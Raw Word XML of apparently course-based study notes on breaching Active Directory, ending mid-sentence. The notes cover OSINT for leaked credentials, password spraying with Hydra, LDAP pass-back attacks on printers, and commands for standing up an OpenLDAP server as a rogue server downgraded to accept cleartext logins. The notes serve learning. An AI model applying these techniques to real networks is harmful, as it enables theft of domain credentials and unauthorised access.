    <w:p w14:paraId="3C2B0858" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2FA94D" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CA8420" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B4F9B4F" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E75E5D6" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A752E5" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F8B12F9" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B454D95" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD1F141" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2402A70E" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792475B6" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C313A7" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="241F57B3" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FFD55D7" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="002C6748">
        <w:t>Breaching Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456F48EF" w14:textId="4FDBE2A1" w:rsidR="00203EBE" w:rsidRPr="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00203EBE">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Try To Get Initial Ac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00203EBE">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D2CDA2" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00560227">
        <w:t>OSINT and Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26277FFE" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00560227">
        <w:t>OSINT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5465F955" w14:textId="3310C036" w:rsidR="00203EBE" w:rsidRPr="00560227" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00560227">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open-source intelligence (OSINT) is the act of gathering and analyzing publicly available data for intelligence purposes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D9029C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>discovering</w:t>
      </w:r>
      <w:r w:rsidRPr="00560227">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> information that has been publicly disclosed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671B0559" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00560227" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00560227">
        <w:t>Users who ask questions on public forums such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00560227">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Stack Overflow</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00560227">
        <w:t> but disclose sensitive information such as their credentials in the question.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A90E83" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00560227" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00560227">
        <w:t>Developers that upload scripts to services such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00560227">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Github</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00560227">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00560227">
        <w:t>credentials hardcoded</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00560227">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9E6FA2" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00560227" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00560227">
        <w:lastRenderedPageBreak/>
        <w:t>Credentials being disclosed in past breaches since employees used their work accounts to sign up for other external websites. Websites such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00560227">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>HaveIBeenPwned</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00560227">
        <w:t> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00560227">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>DeHashed</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00560227">
        <w:t> determine if someone's information in a publicly known data breach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2D94F6" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EB865A1" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00516ECD">
        <w:t>NTLM Authenticated Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531F972C" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5797">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">New Technology LAN Manager (NTLM) is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C5797">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C5797">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> suite of security protocols used to authenticate users' identities in AD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF749F9" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="007C5797" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5797">
        <w:t xml:space="preserve">uthentication by using a challenge-response-based scheme called </w:t>
      </w:r>
      <w:r w:rsidRPr="007C5797">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetNTLM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DDD13E" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5797">
        <w:t>NetNTLM, also often referred to as Windows Authentication or NTLM Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B0EDB2" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06549022" wp14:editId="752A2677">
            <wp:extent cx="3358243" cy="1872867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1415404341" name="Picture 3"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4341" name="Picture 3" descr="A diagram of a serv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0590" cy="1885330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="389BAC04" w14:textId="3169FC1B" w:rsidR="00203EBE" w:rsidRPr="00312025" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="00312025">
        <w:t xml:space="preserve">Application relies on DC for </w:t>
      </w:r>
      <w:r w:rsidR="00281D45" w:rsidRPr="00312025">
        <w:t>Authentication and</w:t>
      </w:r>
      <w:r w:rsidRPr="00312025">
        <w:t xml:space="preserve"> act as a man in middle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4722F3F0" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5797">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Brute-force Login Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F519E7" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="007C5797">
        <w:t xml:space="preserve">To not be locked </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C5797">
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C5797">
        <w:t xml:space="preserve"> the wrong login attempts, instead use password spraying</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (find a likely password that may be used in this environment and try it with all users one by one)</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5797">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEF72FC" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="007C5797" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId25" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="007C5797">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Hydra</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C5797">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C5797">
        <w:t>to assist with the password spraying attack. Better to be scripted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101AECA4" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F500CE" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00312025" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00312025">
        <w:t>LDAP Bind Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192CC5A4" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312025">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lightweight Directory Access Protocol (LDAP) authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is a</w:t>
      </w:r>
      <w:r w:rsidRPr="00312025">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nother method of AD authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A6E025" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00B83B38" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="00B83B38">
        <w:t xml:space="preserve">In LDAP authentication Application </w:t>
      </w:r>
      <w:r w:rsidRPr="00697BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>directly</w:t>
      </w:r>
      <w:r w:rsidRPr="00B83B38">
        <w:t xml:space="preserve"> verifies the user's credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF1D4CA" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00B83B38" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="00B83B38">
        <w:lastRenderedPageBreak/>
        <w:t>Application has a pair of AD credentials that it can use first to query LDAP and then verify the AD user's credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517D320F" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00B83B38" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="00B83B38">
        <w:t>LDAP authentication is a popular mechanism with third-party (non-Microsoft) applications that integrate with AD. Like Gitlab, Jenkins, Printers, VPNs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF639C6" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00B83B38" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="00B83B38">
        <w:t>Our goal is to read the configuration files to recover these AD credentials that are stored on LDAB services itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63132FFA" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D129352" wp14:editId="7CAAA6CC">
            <wp:extent cx="5742214" cy="1352733"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="616064481"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4481" name="Picture 4" descr="A diagram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045" cy="1357405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72247BDC" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE4A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LDAP Pass-back Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB0924A" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="009074DD">
        <w:t>Attacks against LDAP authentication mechanisms</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE92C54" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r>
        <w:t xml:space="preserve">As LDAP authenticates users by itself, LDAP is used by </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the network</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> devices or services like </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>printer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>. EX: when user in domain need to access printer with his username &amp; password, printer send these user credentials to LDAP and LDAP authenticate this user and see if this user allowed to access printer or not, printer itself have account that for itself to access LDAP as a Printer (service user) on LDAP, printer use this account to connect LDAP then pass the normal user to LDAP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38564757" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r>
        <w:t xml:space="preserve">Pass-back attack occurs when we abuse LDAP Configuration on Printer or any service to inject our LDAP as the LDAP for this service, so after that the printer will send user credentials that try to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>access it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to our machine (the fake LDAP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FBB09E" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="006C483D" w:rsidRDefault="00203EBE" w:rsidP="00203EBE"/>
    <w:p w14:paraId="32B37956" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hosting a Rogue LDAP Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A42AD36" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00A54FE9" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54FE9">
        <w:t>Using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A54FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OpenLDAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFBC9B5" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00A54FE9" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00A54FE9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt-get update &amp;&amp; sudo apt-get -y install slapd ldap-utils &amp;&amp; sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00A54FE9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>systemctl enable slapd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0875FD79" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configure it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3189C0D5" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00A54FE9">
        <w:t>sudo dpkg-reconfigure -p low slapd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB775DC" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Options will appear:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75314186" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS Name </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The Domain Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DABB241" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Configure Slapd </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> No</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE25C21" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Downgrade </w:t>
      </w:r>
      <w:r w:rsidRPr="00875E03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LDAP server, to make it vulnerable by downgrading the supported authentication mechanisms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF522DA" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875E03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ensure that our LDAP server only supports </w:t>
      </w:r>
      <w:r w:rsidRPr="006C324A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PLAIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00875E03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="006C324A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>LOGIN</w:t>
